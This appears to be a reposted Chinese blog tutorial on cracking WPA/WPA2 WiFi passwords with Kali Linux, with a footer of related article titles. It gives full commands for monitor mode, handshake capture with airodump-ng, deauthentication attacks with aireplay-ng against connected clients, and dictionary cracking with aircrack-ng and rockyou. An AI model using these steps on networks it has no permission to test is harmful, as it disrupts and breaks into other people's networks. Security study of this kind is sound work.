安全系列之wifi破解思路

声明:此文章仅供研究学习和技术交流,请勿用于破解他人 WIFI 密码!违反法律,一切后果自负!

一.准备工作

1. 硬件准备

  • 无线网卡:一般笔记本自带的无线网卡不支持监听模式,所以要使用一个外置的无线网卡,这里推荐购买3070或者8187芯片的外置USB无线网卡,8187L芯片是一种内含集成电路的硅片,是一种大功率无线网卡的首脑部分,常被用做“蹭网卡”芯片。具有体积小,辐射大,使用价值高等特点。

2. 软件准备

  • 操作系统: https://www.kali.org/downloads/ ,在kail linux上载最新的镜像,kail linux中自带很多工具
  • 虚拟机软件:vmware或virtualbox

 二.安装kail linux

1.在vmare中创建虚拟这步就省略,网络连接桥接和NAT都可以,只是稍微提注意的是版本选择是先debian,和在显示器可以调整开启“加速3D图形”,图形内存改成 “1G”,这是为了以后能使用GPU破解wifi密码做的准备

2. kail linux的过程也是比较长,可以参考官方文档的https://docs.kali.org/installation/kali-linux-hard-disk-install

三.kail linux上的基本配置

1. 检查下kail linux的版本

[email protected]:~# lsb_release -a
No LSB modules are available.
Distributor ID:	Kali
Description:	Kali GNU/Linux Rolling
Release:	kali-rolling
Codename:	kali-rolling

注释: Kali虽然是基于Debian的一个linux版本,但它却不同于Debian7,8,9等这些版本,并且和以前采用的测试方法也不同。不再采用那些,有时被认为是全新的,主流的,有时又是过时的循环软件测试。Kali Rolling是Debian的即时更新版,只要Debian中有更新,更新包就会放入Kali Rolling中,供用户下载使用。它为提用户提供了一个稳定更新的版本,同时会带有最新的更新安装包。在过去的5个月中,只要是对该工具进行了更新,系统都会在第一时间自动发出通知,这是Kali Rolling的一大特色。并且确保了Kali Rolling工具库中的监控工具总是维持在最新版本,为用户的使用提供了很大的便利。

2.更新系统的安装源

[email protected]:~# vim /etc/apt/sources.list
#ustc
deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib
deb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib

#aliyun
deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib
deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free contrib

3.更新系统,注意使用的时间比较长,而且如果更新没完成,可以会导致以下操作中有些工具无法使用

[email protected]:~# apt-get update && apt-get upgrade && apt-get dist-upgrade 

报错处理:
Could not get lock /var/lib/dpkg/lock - open (11: Resource temporarily unavailable) E: Unable to lock the administration di
解决方案:
其实这是因为有另外一个程序在运行,导致锁不可用。原因可能是上次运行更新或安装没有正常完成。解决办法是杀死此进程
sudo rm /var/cache/apt/archives/lock
sudo rm /var/lib/dpkg/lock
但是这样不能解决问题:可能还会出现问题,解决方案:
1,sudo dpkg --configure -a
2,sudo apt-get update

4.安装vmwaretools,完成后并重启系统

  • 先把虚拟机的镜像弹出,设置到CD/DVD进行自动检测,

  • 安装linux的内核头文件
[email protected]:~# apt-get install linux-headers-$(uname -r) 
  • 加载vmware-tools: vmware ----> 点击导航中的虚拟机---->安装VMware Tools(T)
  • 安装vmware tools,以下是针对个人情况,可以参考vm官方文档
#点击安装的按钮后,软件会自动挂载
[email protected]:~# mount
/dev/sr0 on /media/cdrom0 type iso9660 (ro,nosuid,nodev,noexec,relatime,nojoliet,check=s,map=n,blocksize=2048,user)

[email protected]:~# ls /media/cdrom0/
manifest.txt     VMwareTools-10.0.5-3228253.tar.gz  vmware-tools-upgrader-64
run_upgrader.sh  vmware-tools-upgrader-32

#把tool拷贝到自己的目录下
[email protected]:~# cp /media/cdrom0/VMwareTools-10.0.5-3228253.tar.gz /home/
[email protected]:~# cd /home/

#解压安装
[email protected]:/home# tar xf VMwareTools-10.0.5-3228253.tar.gz
[email protected]:/home# cd vmware-tools-distrib/
[email protected]:/home/vmware-tools-distrib# ./vmware-install.pl
Enjoy,
--the VMware team
Found VMware Tools CDROM mounted at /media/cdrom0. Ejecting device /dev/sr0 ...

5.接入8187无线网卡(这步可以事先做好)

  • 插入计算机后,系统会自动安装驱动,如找不到相应的驱动需要自行上网下载

  • vmware右下方会出现一个USB形状的图标,选择连接8187(或者导航中的虚拟机--》可移动设备),确保以上都能操作好,否则可以没法显示无线网卡

四.抓取wifi的数据包

1.检查无线网卡的状态(确保可以显示wlan0)

[email protected]:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

注:此时wlan0是manged模式

2. 开启wlan0的监控模式

[email protected]:~# airmon-ng start wlan0

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run ‘airmon-ng check kill‘

   PID Name
   484 NetworkManager
   523 dhclient
   717 wpa_supplicant

PHY	Interface	Driver		Chipset

phy0	wlan0		rtl8187		Realtek Semiconductor Corp. RTL8187

		(mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
		(mac80211 station mode vif disabled for [phy0]wlan0)

3.监听周围的无线

[email protected]:~# airodump-ng wlan0mon

注:这里li是自己路由器,把BSSID和频道(CH)号,ESSID记录下来

4.使用无线网卡抓取握手包。所谓握手包,就是包含密码的包,当有新用户或断开用户自动连接wifi时,会发送握手包。

[email protected]:~# airodump-ng -c 9 --bssid  B0:48:7A:??:??:?? -w ~/test wlan0mon

-c指定频道号
bssid指定路由器bssid
w指定抓取的数据包保存位置,~/test表示存在root/目录下,并且包的名称以test-xx.cap的格式储存。

5.设法让设备重新连接wifi,直接出现WPA handshake为止

两条命令一样:
[email protected]:~# aireplay-ng -0 10 -a B0:48:7A:??:??:?? -c 4C:34:88:??:??:??  wlan0mon
[email protected]:~# aireplay-ng -0 5 -a B0:48:7A:??:??:?? wlan0mon (两个命令都可以,可能要多试几次)

0表示发起deauthentication攻击 10代表攻击10次
a指定无线路由器BSSID,也就是路由器的MAC地址
c指定强制断开的设备,也就是STATION的MAC地址

注:这里需要使用重新连接,但是一般情况下等待比较长,因为自身就是设备,可以让设备自行下线,起deauthentication攻击,然后抓取它的握手包.aireplay-ng的工具,它可以强制用户断开wifi连接,具体方法是:给连接到wifi的一个设备发送一个deauth(反认证)包,让那个设备断开wifi,随后设备会再次连接wifi,这样我们就能顺利而快速的抓到握手包了。

6.关闭无线网卡监听模式(抓取到握手包后)

[email protected]:~# airmon-ng stop wlan0mon

五.使用kail linux自带工具破解

1.解压kail linux自带密码字典(注意: 无线的密码有可能在字典中找不到)

[email protected]:~# gzip -d /usr/share/wordlists/rockyou.txt.gz

2.分析破解握手包中的密码

[email protected]:~# aircrack-ng -a2 -b  B0:48:??:??:???? -w /usr/share/wordlists/rockyou.txt ~/test-01.cap 

参数解释:
a2代表WPA的握手包
b指定要破解的wifi BSSID。
w指定字典文件
最后是抓取的包路径

3. 以下的破解的过程,花费了三个多小时,最终没有破解成功

原文地址:https://www.cnblogs.com/reid21/p/8505539.html

时间: 2024-11-07 19:26:23

安全系列之wifi破解思路的相关文章

一些Wifi破解姿势

wlan0:无线网卡设备 BSSID/AP's MAC:目标路由器的mac地址 Client's MAC:连接到此wifi客户端的mac地址 ESSID:这个无线的名字 CH[X] 扫描的信道号,因为airodump是跳频扫描的,会一直扫描13个信道.后面是你的扫描时间和你本地时间. BSSID:路由器MAC地址 PWR:网卡的信号水平,新号越好数值越大,但是例如第一个出现‘-1’说明该客户端不在我的监听范围内. Beacons:就是Beacon数据的速率 #Date:被捕获的数据分组数量 #/

[WIFI]破解工具-BT4+unetbootin+spoonwep/wpa

一.首先下载这三个工具: 1.BT4正式版: 下载地址:http://ftp.heanet.ie/mirrors/backtrack/bt4-pre-final.iso 2.U盘启动制作工具:unetbootin-windows-356 下载地址:http://www.atuonce.cn/blog/attachments/month_0906/t2009621225526.rar 3.spoonwep-wpa破解工具用于BT4下的deb安装包 迅雷下载地址:(已经修正下载地址, 打开迅雷, 然

apk普通破解思路

apk去除广告 1.在AndroidManifest.xml中找到,广告访问网站的标签声明,将他删除 2.重新打包,返回什么现象 3.搜索域名,'域名.' 4.将域名删除,或更改跳转 apk破解思路 1.安装应用了解需求,查看报错信息 2.反编译代码定位报错信息位置 3.分析逻辑,找到修改逻辑的判断点 4.重新编译逐个击破

wifi破解不是真黑客不靠谱?

Wifi破解神器骗局:摆地摊+网络兜售 近日,"万能wifi密码破解器"风靡全国地摊,各地小贩开始兜售这种蹭网卡,声称可破解各种wifi密码,当场测试也是成功的,但是买主回家一个测试就发现魔力失效.此外,网络上也有售卖免费wifi上网接收器.卡皇等,其中也不乏欺诈陷阱. 真相:市民不免气愤,拆开一看神器竟是一个用USB供电的发光二极管,进价不够3.5元,挂上"万能wifi密码破解器"的头衔,竟卖到15.35或50元不等.摊贩的骗局就是,选中的wifi是通过身上携带的

ubuntu下aircrack-ng的wifi破解

首先安装aircrack-ng,apt-get install aircrack-ng. 然后打开shell,输入airmon-ng start wlan0. 输入airodump-ng mon0. 输入airodump-ng  -c 1(频道) -w wep.cap --bssid 74:25:8A:7B:59:C8(目标mac) mon0. 输入ifconfig wlan0 down. 输入aireplay-ng -1 0 -a 74:25:8A:7B:59:C8(目标mac) -h 90:

人工智能计算器AI Calculator 3.3.0 详细破解思路&教程

人工智能计算器AI Calculator 3.3.0 详细破解思路&教程 [文章标题]:人工智能计算器AI Calculator 3.3.0 详细破解思路&教程 [文章作者]: Ericky [作者邮箱]: [email protected] [下载地址]: 附件附上 [保护方式]: 360加固 [作者声明]: 主要记录自己的学习过程!欢迎交流学习 0x1脱壳 具体的脱壳去看看以前的一些文章,此篇文章主要讲破解部分,壳就略过了 0x2破解 先安装程序,看看错误提示,所谓知己知彼百战不殆正是

commview for wifi 破解无线

相信了解无线网络的读者都知道安全性是无线网络的先天不足,正是因为他的传播通过空气,所以信号很容易出现外泄问题,相比有线网络来说信号监听变得非常简单. 部分用户通过WEP加密的方式来保护网络通讯数据包避免被监听者破译,不过WEP加密在现今这个安全技术飞速发展的时代已经不再保险,网上也有很多介绍实 现无线WEP入侵的方法.今天笔者就再介绍一个更为精简的方法,让我们可以在五分钟之内实现无线WEP网络的入侵,将WEP加密密钥轻松还原出明文. 一,五分钟实现无线WEP入侵的特点:   众所周知WEP加密入

实战-Fluxion与wifi热点伪造、钓鱼、中间人攻击、wifi破解

原作者:PG     整理:玄魂工作室-荣杰 目录: 0x00-Fluxion是什么 0x01-Fluxion工作原理 0x02-Kali上安装fluxion 0x03-Fluxion工具使用说明+实战破解wifi 小编在作者PG原稿上斗胆修改,”跪求”原作者赐风油精 0x00-Fluxion是什么 Fluxion是一个无线破解工具,这款软件可以帮你挤掉WiFi主人的网络让你自己登陆进去,而且WiFi主人怎么挤也挤不过你.这个工具有点像是Linset的翻版.但是与Linset比较起来,它有着更多

WIFI 破解(初级)

话不多说,先来看看字典破解 wpa2 的效果 =================================== ===============================================字典破解 wifi-wpa/wpa2目前最常用的加密类型此方法只适合破解弱口令其他暴力破解伤CPU/GPU===============================================1. 安装aircrack-ng   1. 直接使用apt-get,但有的软件仓库不是最